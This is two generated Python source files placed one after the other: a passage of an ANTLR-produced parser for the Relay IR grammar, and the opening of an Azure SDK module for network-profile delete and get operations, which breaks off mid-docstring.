super().__init__(parent, invokingState)
self.parser = parser
def ident(self):
return self.getTypedRuleContext(RelayParser.IdentContext,0)
def argList(self):
return self.getTypedRuleContext(RelayParser.ArgListContext,0)
def body(self):
return self.getTypedRuleContext(RelayParser.BodyContext,0)
def typeParamSeq(self):
return self.getTypedRuleContext(RelayParser.TypeParamSeqContext,0)
def type_(self):
return self.getTypedRuleContext(RelayParser.Type_Context,0)
def getRuleIndex(self):
return RelayParser.RULE_defn
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitDefn" ):
return visitor.visitDefn(self)
else:
return visitor.visitChildren(self)
def defn(self):
localctx = RelayParser.DefnContext(self, self._ctx, self.state)
self.enterRule(localctx, 8, self.RULE_defn)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 173
self.match(RelayParser.T__14)
self.state = 174
self.ident()
self.state = 176
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==RelayParser.T__3:
self.state = 175
self.typeParamSeq()
self.state = 178
self.match(RelayParser.T__0)
self.state = 179
self.argList()
self.state = 180
self.match(RelayParser.T__1)
self.state = 183
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==RelayParser.T__13:
self.state = 181
self.match(RelayParser.T__13)
self.state = 182
self.type_()
self.state = 185
self.body()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ArgListContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def varList(self):
return self.getTypedRuleContext(RelayParser.VarListContext,0)
def attrList(self):
return self.getTypedRuleContext(RelayParser.AttrListContext,0)
def getRuleIndex(self):
return RelayParser.RULE_argList
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitArgList" ):
return visitor.visitArgList(self)
else:
return visitor.visitChildren(self)
def argList(self):
localctx = RelayParser.ArgListContext(self, self._ctx, self.state)
self.enterRule(localctx, 10, self.RULE_argList)
try:
self.state = 193
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,16,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 187
self.varList()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 188
self.attrList()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 189
self.varList()
self.state = 190
self.match(RelayParser.T__2)
self.state = 191
self.attrList()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class VarListContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def var(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.VarContext)
else:
return self.getTypedRuleContext(RelayParser.VarContext,i)
def getRuleIndex(self):
return RelayParser.RULE_varList
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitVarList" ):
return visitor.visitVarList(self)
else:
return visitor.visitChildren(self)
def varList(self):
localctx = RelayParser.VarListContext(self, self._ctx, self.state)
self.enterRule(localctx, 12, self.RULE_varList)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 203
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << RelayParser.GLOBAL_VAR) | (1 << RelayParser.LOCAL_VAR) | (1 << RelayParser.GRAPH_VAR) | (1 << RelayParser.CNAME))) != 0):
self.state = 195
self.var()
self.state = 200
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,17,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
self.state = 196
self.match(RelayParser.T__2)
self.state = 197
self.var()
self.state = 202
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,17,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class VarContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def ident(self):
return self.getTypedRuleContext(RelayParser.IdentContext,0)
def type_(self):
return self.getTypedRuleContext(RelayParser.Type_Context,0)
def getRuleIndex(self):
return RelayParser.RULE_var
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitVar" ):
return visitor.visitVar(self)
else:
return visitor.visitChildren(self)
def var(self):
localctx = RelayParser.VarContext(self, self._ctx, self.state)
self.enterRule(localctx, 14, self.RULE_var)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 205
self.ident()
self.state = 208
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==RelayParser.T__15:
self.state = 206
self.match(RelayParser.T__15)
self.state = 207
self.type_()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class AttrListContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def attr(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.AttrContext)
else:
return self.getTypedRuleContext(RelayParser.AttrContext,i)
def getRuleIndex(self):
return RelayParser.RULE_attrList
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitAttrList" ):
return visitor.visitAttrList(self)
else:
return visitor.visitChildren(self)
def attrList(self):
localctx = RelayParser.AttrListContext(self, self._ctx, self.state)
self.enterRule(localctx, 16, self.RULE_attrList)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 218
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==RelayParser.CNAME:
self.state = 210
self.attr()
self.state = 215
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==RelayParser.T__2:
self.state = 211
self.match(RelayParser.T__2)
self.state = 212
self.attr()
self.state = 217
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class AttrContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def CNAME(self):
return self.getToken(RelayParser.CNAME, 0)
def expr(self):
return self.getTypedRuleContext(RelayParser.ExprContext,0)
def getRuleIndex(self):
return RelayParser.RULE_attr
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitAttr" ):
return visitor.visitAttr(self)
else:
return visitor.visitChildren(self)
def attr(self):
localctx = RelayParser.AttrContext(self, self._ctx, self.state)
self.enterRule(localctx, 18, self.RULE_attr)
try:
self.enterOuterAlt(localctx, 1)
self.state = 220
self.match(RelayParser.CNAME)
self.state = 221
self.match(RelayParser.T__8)
self.state = 222
self.expr(0)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class TypeParamSeqContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def ident(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.IdentContext)
else:
return self.getTypedRuleContext(RelayParser.IdentContext,i)
def getRuleIndex(self):
return RelayParser.RULE_typeParamSeq
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTypeParamSeq" ):
return visitor.visitTypeParamSeq(self)
else:
return visitor.visitChildren(self)
def typeParamSeq(self):
localctx = RelayParser.TypeParamSeqContext(self, self._ctx, self.state)
self.enterRule(localctx, 20, self.RULE_typeParamSeq)
self._la = 0 # Token type
try:
self.state = 237
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,23,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 224
self.match(RelayParser.T__3)
self.state = 225
self.match(RelayParser.T__4)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 226
self.match(RelayParser.T__3)
self.state = 227
self.ident()
self.state = 232
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==RelayParser.T__2:
self.state = 228
self.match(RelayParser.T__2)
self.state = 229
self.ident()
self.state = 234
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 235
self.match(RelayParser.T__4)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Type_Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return RelayParser.RULE_type_
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class IntTypeContext(Type_Context):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.Type_Context
super().__init__(parser)
self.copyFrom(ctx)
def NAT(self):
return self.getToken(RelayParser.NAT, 0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitIntType" ):
return visitor.visitIntType(self)
else:
return visitor.visitChildren(self)
class TupleTypeContext(Type_Context):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.Type_Context
super().__init__(parser)
self.copyFrom(ctx)
def type_(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.Type_Context)
else:
return self.getTypedRuleContext(RelayParser.Type_Context,i)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTupleType" ):
return visitor.visitTupleType(self)
else:
return visitor.visitChildren(self)
class TypeIdentTypeContext(Type_Context):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.Type_Context
super().__init__(parser)
self.copyFrom(ctx)
def typeIdent(self):
return self.getTypedRuleContext(RelayParser.TypeIdentContext,0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTypeIdentType" ):
return visitor.visitTypeIdentType(self)
else:
return visitor.visitChildren(self)
class IncompleteTypeContext(Type_Context):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.Type_Context
super().__init__(parser)
self.copyFrom(ctx)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitIncompleteType" ):
return visitor.visitIncompleteType(self)
else:
return visitor.visitChildren(self)
class TensorTypeContext(Type_Context):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.Type_Context
super().__init__(parser)
self.copyFrom(ctx)
def shapeSeq(self):
return self.getTypedRuleContext(RelayParser.ShapeSeqContext,0)
def type_(self):
return self.getTypedRuleContext(RelayParser.Type_Context,0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTensorType" ):
return visitor.visitTensorType(self)
else:
return visitor.visitChildren(self)
class FuncTypeContext(Type_Context):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.Type_Context
super().__init__(parser)
self.copyFrom(ctx)
def type_(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.Type_Context)
else:
return self.getTypedRuleContext(RelayParser.Type_Context,i)
def typeParamSeq(self):
return self.getTypedRuleContext(RelayParser.TypeParamSeqContext,0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitFuncType" ):
return visitor.visitFuncType(self)
else:
return visitor.visitChildren(self)
def type_(self):
localctx = RelayParser.Type_Context(self, self._ctx, self.state)
self.enterRule(localctx, 22, self.RULE_type_)
self._la = 0 # Token type
try:
self.state = 284
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,28,self._ctx)
if la_ == 1:
localctx = RelayParser.TupleTypeContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 239
self.match(RelayParser.T__0)
self.state = 240
self.match(RelayParser.T__1)
pass
elif la_ == 2:
localctx = RelayParser.TupleTypeContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 241
self.match(RelayParser.T__0)
self.state = 242
self.type_()
self.state = 243
self.match(RelayParser.T__2)
self.state = 244
self.match(RelayParser.T__1)
pass
elif la_ == 3:
localctx = RelayParser.TupleTypeContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 246
self.match(RelayParser.T__0)
self.state = 247
self.type_()
self.state = 250
self._errHandler.sync(self)
_la = self._input.LA(1)
while True:
self.state = 248
self.match(RelayParser.T__2)
self.state = 249
self.type_()
self.state = 252
self._errHandler.sync(self)
_la = self._input.LA(1)
if not (_la==RelayParser.T__2):
break
self.state = 254
self.match(RelayParser.T__1)
pass
elif la_ == 4:
localctx = RelayParser.TypeIdentTypeContext(self, localctx)
self.enterOuterAlt(localctx, 4)
self.state = 256
self.typeIdent()
pass
elif la_ == 5:
localctx = RelayParser.TensorTypeContext(self, localctx)
self.enterOuterAlt(localctx, 5)
self.state = 257
self.match(RelayParser.T__16)
self.state = 258
self.match(RelayParser.T__3)
self.state = 259
self.shapeSeq()
self.state = 260
self.match(RelayParser.T__2)
self.state = 261
self.type_()
self.state = 262
self.match(RelayParser.T__4)
pass
elif la_ == 6:
localctx = RelayParser.FuncTypeContext(self, localctx)
self.enterOuterAlt(localctx, 6)
self.state = 264
self.match(RelayParser.T__12)
self.state = 266
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==RelayParser.T__3:
self.state = 265
self.typeParamSeq()
self.state = 268
self.match(RelayParser.T__0)
self.state = 277
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << RelayParser.T__0) | (1 << RelayParser.T__12) | (1 << RelayParser.T__16) | (1 << RelayParser.T__17) | (1 << RelayParser.NAT) | (1 << RelayParser.CNAME))) != 0):
self.state = 269
self.type_()
self.state = 274
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==RelayParser.T__2:
self.state = 270
self.match(RelayParser.T__2)
self.state = 271
self.type_()
self.state = 276
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 279
self.match(RelayParser.T__1)
self.state = 280
self.match(RelayParser.T__13)
self.state = 281
self.type_()
pass
elif la_ == 7:
localctx = RelayParser.IncompleteTypeContext(self, localctx)
self.enterOuterAlt(localctx, 7)
self.state = 282
self.match(RelayParser.T__17)
pass
elif la_ == 8:
localctx = RelayParser.IntTypeContext(self, localctx)
self.enterOuterAlt(localctx, 8)
self.state = 283
self.match(RelayParser.NAT)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ShapeSeqContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def shape(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.ShapeContext)
else:
return self.getTypedRuleContext(RelayParser.ShapeContext,i)
def getRuleIndex(self):
return RelayParser.RULE_shapeSeq
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitShapeSeq" ):
return visitor.visitShapeSeq(self)
else:
return visitor.visitChildren(self)
def shapeSeq(self):
localctx = RelayParser.ShapeSeqContext(self, self._ctx, self.state)
self.enterRule(localctx, 24, self.RULE_shapeSeq)
self._la = 0 # Token type
try:
self.state = 303
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,30,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 286
self.match(RelayParser.T__0)
self.state = 287
self.match(RelayParser.T__1)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 288
self.match(RelayParser.T__0)
self.state = 289
self.shape()
self.state = 290
self.match(RelayParser.T__2)
self.state = 291
self.match(RelayParser.T__1)
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 293
self.match(RelayParser.T__0)
self.state = 294
self.shape()
self.state = 297
self._errHandler.sync(self)
_la = self._input.LA(1)
while True:
self.state = 295
self.match(RelayParser.T__2)
self.state = 296
self.shape()
self.state = 299
self._errHandler.sync(self)
_la = self._input.LA(1)
if not (_la==RelayParser.T__2):
break
self.state = 301
self.match(RelayParser.T__1)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ShapeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return RelayParser.RULE_shape
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class ParensShapeContext(ShapeContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ShapeContext
super().__init__(parser)
self.copyFrom(ctx)
def shape(self):
return self.getTypedRuleContext(RelayParser.ShapeContext,0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitParensShape" ):
return visitor.visitParensShape(self)
else:
return visitor.visitChildren(self)
class IntShapeContext(ShapeContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ShapeContext
super().__init__(parser)
self.copyFrom(ctx)
def NAT(self):
return self.getToken(RelayParser.NAT, 0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitIntShape" ):
return visitor.visitIntShape(self)
else:
return visitor.visitChildren(self)
def shape(self):
localctx = RelayParser.ShapeContext(self, self._ctx, self.state)
self.enterRule(localctx, 26, self.RULE_shape)
try:
self.state = 310
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [RelayParser.T__0]:
localctx = RelayParser.ParensShapeContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 305
self.match(RelayParser.T__0)
self.state = 306
self.shape()
self.state = 307
self.match(RelayParser.T__1)
pass
elif token in [RelayParser.NAT]:
localctx = RelayParser.IntShapeContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 309
self.match(RelayParser.NAT)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class TypeIdentContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def CNAME(self):
return self.getToken(RelayParser.CNAME, 0)
def getRuleIndex(self):
return RelayParser.RULE_typeIdent
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTypeIdent" ):
return visitor.visitTypeIdent(self)
else:
return visitor.visitChildren(self)
def typeIdent(self):
localctx = RelayParser.TypeIdentContext(self, self._ctx, self.state)
self.enterRule(localctx, 28, self.RULE_typeIdent)
try:
self.enterOuterAlt(localctx, 1)
self.state = 312
self.match(RelayParser.CNAME)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class BodyContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def expr(self):
return self.getTypedRuleContext(RelayParser.ExprContext,0)
def getRuleIndex(self):
return RelayParser.RULE_body
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitBody" ):
return visitor.visitBody(self)
else:
return visitor.visitChildren(self)
def body(self):
localctx = RelayParser.BodyContext(self, self._ctx, self.state)
self.enterRule(localctx, 30, self.RULE_body)
try:
self.enterOuterAlt(localctx, 1)
self.state = 314
self.match(RelayParser.T__10)
self.state = 315
self.expr(0)
self.state = 316
self.match(RelayParser.T__11)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ScalarContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return RelayParser.RULE_scalar
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class ScalarFloatContext(ScalarContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ScalarContext
super().__init__(parser)
self.copyFrom(ctx)
def FLOAT(self):
return self.getToken(RelayParser.FLOAT, 0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitScalarFloat" ):
return visitor.visitScalarFloat(self)
else:
return visitor.visitChildren(self)
class ScalarBoolContext(ScalarContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ScalarContext
super().__init__(parser)
self.copyFrom(ctx)
def BOOL_LIT(self):
return self.getToken(RelayParser.BOOL_LIT, 0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitScalarBool" ):
return visitor.visitScalarBool(self)
else:
return visitor.visitChildren(self)
class ScalarIntContext(ScalarContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ScalarContext
super().__init__(parser)
self.copyFrom(ctx)
def NAT(self):
return self.getToken(RelayParser.NAT, 0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitScalarInt" ):
return visitor.visitScalarInt(self)
else:
return visitor.visitChildren(self)
def scalar(self):
localctx = RelayParser.ScalarContext(self, self._ctx, self.state)
self.enterRule(localctx, 32, self.RULE_scalar)
try:
self.state = 321
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [RelayParser.FLOAT]:
localctx = RelayParser.ScalarFloatContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 318
self.match(RelayParser.FLOAT)
pass
elif token in [RelayParser.NAT]:
localctx = RelayParser.ScalarIntContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 319
self.match(RelayParser.NAT)
pass
elif token in [RelayParser.BOOL_LIT]:
localctx = RelayParser.ScalarBoolContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 320
self.match(RelayParser.BOOL_LIT)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class IdentContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def opIdent(self):
return self.getTypedRuleContext(RelayParser.OpIdentContext,0)
def GLOBAL_VAR(self):
return self.getToken(RelayParser.GLOBAL_VAR, 0)
def LOCAL_VAR(self):
return self.getToken(RelayParser.LOCAL_VAR, 0)
def GRAPH_VAR(self):
return self.getToken(RelayParser.GRAPH_VAR, 0)
def getRuleIndex(self):
return RelayParser.RULE_ident
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitIdent" ):
return visitor.visitIdent(self)
else:
return visitor.visitChildren(self)
def ident(self):
localctx = RelayParser.IdentContext(self, self._ctx, self.state)
self.enterRule(localctx, 34, self.RULE_ident)
try:
self.state = 327
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [RelayParser.CNAME]:
self.enterOuterAlt(localctx, 1)
self.state = 323
self.opIdent()
pass
elif token in [RelayParser.GLOBAL_VAR]:
self.enterOuterAlt(localctx, 2)
self.state = 324
self.match(RelayParser.GLOBAL_VAR)
pass
elif token in [RelayParser.LOCAL_VAR]:
self.enterOuterAlt(localctx, 3)
self.state = 325
self.match(RelayParser.LOCAL_VAR)
pass
elif token in [RelayParser.GRAPH_VAR]:
self.enterOuterAlt(localctx, 4)
self.state = 326
self.match(RelayParser.GRAPH_VAR)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):
if self._predicates == None:
self._predicates = dict()
self._predicates[2] = self.expr_sempred
pred = self._predicates.get(ruleIndex, None)
if pred is None:
raise Exception("No predicate with index:" + str(ruleIndex))
else:
return pred(localctx, predIndex)
def expr_sempred(self, localctx:ExprContext, predIndex:int):
if predIndex == 0:
return self.precpred(self._ctx, 16)
if predIndex == 1:
return self.precpred(self._ctx, 15)
if predIndex == 2:
return self.precpred(self._ctx, 14)
if predIndex == 3:
return self.precpred(self._ctx, 13)
if predIndex == 4:
return self.precpred(self._ctx, 4)
if predIndex == 5:
return self.precpred(self._ctx, 18)
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class NetworkProfilesOperations(object):
"""NetworkProfilesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
network_profile_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-08-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkProfileName': self._serialize.url("network_profile_name", network_profile_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkProfiles/{networkProfileName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
network_profile_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified network profile.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_profile_name: The name of the NetworkProfile.
:type network_profile_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
network_profile_name=network_profile_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkProfileName': self._serialize.url("network_profile_name", network_profile_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkProfiles/{networkProfileName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
network_profile_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "_models.NetworkProfile"
"""Gets the specified network profile in a specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_profile_name: The name of the Public IP Prefix.
:type network_profile_name: str
:param expand: Expands referenced resources.
:type expand: str
